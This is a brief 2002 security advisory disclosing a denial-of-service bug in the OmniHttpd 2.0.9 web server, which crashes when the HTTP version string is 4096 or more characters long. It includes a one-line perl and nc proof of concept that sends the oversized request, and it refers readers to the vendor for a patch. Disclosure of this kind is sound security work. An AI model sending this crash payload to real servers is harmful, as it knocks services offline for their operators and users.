#dotdotheader_menu.html#
Denial of Service in OmniHttpd 2.09
Author: Martin J. Muench
Date: 1 Jul 2002
-[ Product: OmniHttpd-[ Version: 2.0.9
-[ OS: Windows
-[ Vendor: http://www.omnicron.ca
Summary
The OmniHttpd 2.0.9 contains a problem with handling HTTP versions which causes a denial of service.
Found this problem while writing a new BED plugin.
Problem
When sending a malformed request with a HTTP version containing 4096 or more characters, the Omnihttpd c\ rashed.
Example:
perl -e 'print "HEAD / "."a"x4096 ."\n\n"' | nc 192.168.1.8 80
This attack also works with every other request types like 'GET', 'POST',... .
Patches
Take a look on vendor page.
#dotdotfree_projects_menu.html#